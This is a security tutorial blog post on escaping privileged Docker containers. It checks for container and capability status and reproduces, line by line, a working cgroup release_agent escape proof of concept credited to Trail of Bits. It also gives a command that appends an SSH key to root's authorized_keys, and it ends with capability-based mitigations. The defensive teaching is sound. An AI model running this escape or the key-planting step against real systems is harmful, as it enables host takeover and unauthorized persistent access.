Escaping Docker Privileged Containers


Photo by freestocks on Unsplash

Privileged docker containers are containers that are run with the --privileged flag. Unlike regular containers, these containers have root privilege to the host machine.

Privileged containers are often used when the containers need direct hardware access to complete their tasks. However, privileged docker containers can enable attackers to take over the host system. Today, let’s look at how attackers can escape privileged containers.

Finding an exploitable container

But how can we tell if we are in a privileged container in the first place?

How can you tell if you’re in a container?

Cgroups stands for “control groups”. It is a Linux feature that isolates resource usage and is what docker uses to isolate containers. You can tell if you are in a container by checking the init process’ control group at /proc/1/cgroup. If you are not located inside a container, the control group should be /. On the other hand, if you are inside a container, you should see /docker/CONTAINER_ID instead.

How can you tell if a container is privileged?

Once you’ve determined that you are in a container, you need to determine if that container is privileged. The best way to do this is to run a command that requires the --privileged flag and see if it succeeds.

For example, you can try to add a dummy interface by using an iproute2 command. This command requires the NET_ADMIN capability, which the container would have if it is privileged.

ip link add dummy0 type dummy

If this command runs successfully, you can conclude that the container has the NET_ADMIN capability. NET_ADMIN is part of the privileged capabilities set and containers that don’t have it are not privileged. You can clean up the “dummy0” link after this test by running this command.

ip link delete dummy0

Container escape

So how do you escape a privileged container? You can escape the container by using this script. This example and PoC were taken from the Trail of Bits blog. Read the original post for a more detailed explanation of the PoC. https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/.

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release

host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)

echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd

echo "ps aux > $host_path/output" >> /cmd

chmod a+x /cmd

sh -c 'echo $$ > /tmp/cgrp/x/cgroup.procs'

This PoC works by exploiting cgroups’ “release_agent” feature.

After the last process in a cgroup exits, a command used to remove abandoned cgroups runs. This command is specified in the release_agent file and it runs as root on the host machine. By default, this feature is disabled, and the release_agent path is empty.

This exploit runs code through the release_agent file. We need to create a cgroup, specify its release_agent file, and trigger the release_agent by killing all the processes in the cgroup. The first line in the PoC creates a new cgroup.

mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

The next line enables the release_agent feature.

echo 1 > /tmp/cgrp/x/notify_on_release

Then, the next few lines write the path of our command file to the release_agent file.

host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`

echo "$host_path/cmd" > /tmp/cgrp/release_agent

We can then start writing to our command file. This script will execute the ps aux command and save it to the /output file. We also need to set the script’s execute permission bits.

echo '#!/bin/sh' > /cmd

echo "ps aux > $host_path/output" >> /cmd

chmod a+x /cmd

Finally, trigger the attack by spawning a process that immediately ends inside the cgroup that we created. Our release_agent script will execute after the process ends. You can now read the output of ps aux on the host machine in the /output file.

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

You can use the PoC to execute arbitrary commands on the host system. For example, you can use it to write your SSH key to the root user’s authorized_keys file.

cat id_dsa.pub >> /root/.ssh/authorized_keys

Mitigation

How can you prevent this attack from happening? Instead of granting containers full access to the host system, you should give containers the individual “capabilities” they need.

Docker capabilities give developers granular control over the permissions of a container. Capabilities break down the permissions usually packaged into “root access” into individual permissions.

You can drop or add capabilities with the --cap-drop and --cap-add flags.

--cap-drop=all

--cap-add=LIST_OF_CAPABILITIES

For example, instead of running the container with --privilege, you can grant it the NET_ADMIN capabilities if it needs to perform network-related operations. This flag will grant the container the permissions to configure network interfaces, administer the firewall, and modify routing tables.

--cap-add NET_ADMIN

Conclusion

If possible, avoid running docker containers with the –privileged flag. Privileged containers might allow attackers to break out of the container and gain control over the host system. Grant containers individual capabilities with the –cap-add flag instead.

Further reading

groups and release_agent: https://www.kernel.org/doc/Documentation/cgroup-v1/cgroups.txt

List of Linux kernel capabilities: https://man7.org/linux/man-pages/man7/capabilities.7.html.

Using docker securely: https://docs.docker.com/engine/security/security/#linux-kernel-capabilities.

Security best practices for privileged containers: https://blog.trendmicro.com/trendlabs-security-intelligence/why-running-a-privileged-container-in-docker-is-a-bad-idea/.

Vickie Li